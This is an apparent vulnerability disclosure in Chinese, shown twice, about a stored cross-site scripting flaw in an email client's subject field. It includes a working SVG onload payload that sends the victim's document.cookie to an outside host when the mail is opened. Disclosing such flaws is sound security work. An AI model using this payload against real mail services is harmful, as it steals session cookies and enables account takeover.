VULHUB ™

### 简要描述： 对部分内容处理不当，导致受害者一旦打开特定的邮件session id将会被窃取 ### 详细说明： 给受害者发送主题如下的邮件： ``` <svg onload='img=new Image();img.src="//x55.me/geo.php?get="+document.cookie;'> ``` [<img src="https://images.seebug.org/upload/201407/231520542a4110acfecba634c834b94dfba089ff.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/231520542a4110acfecba634c834b94dfba089ff.jpg) ### 漏洞证明： 当受害者试图打开邮件时，cookie将会被窃取： [<img src="https://images.seebug.org/upload/201407/231521062ce6fc88baa82d6859b50a34bf9cf6b8.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/231521062ce6fc88baa82d6859b50a34bf9cf6b8.jpg)

### 简要描述： 对部分内容处理不当，导致受害者一旦打开特定的邮件session id将会被窃取 ### 详细说明： 给受害者发送主题如下的邮件： ``` <svg onload='img=new Image();img.src="//x55.me/geo.php?get="+document.cookie;'> ``` [<img src="https://images.seebug.org/upload/201407/231520542a4110acfecba634c834b94dfba089ff.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/231520542a4110acfecba634c834b94dfba089ff.jpg) ### 漏洞证明： 当受害者试图打开邮件时，cookie将会被窃取： [<img src="https://images.seebug.org/upload/201407/231521062ce6fc88baa82d6859b50a34bf9cf6b8.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/231521062ce6fc88baa82d6859b50a34bf9cf6b8.jpg)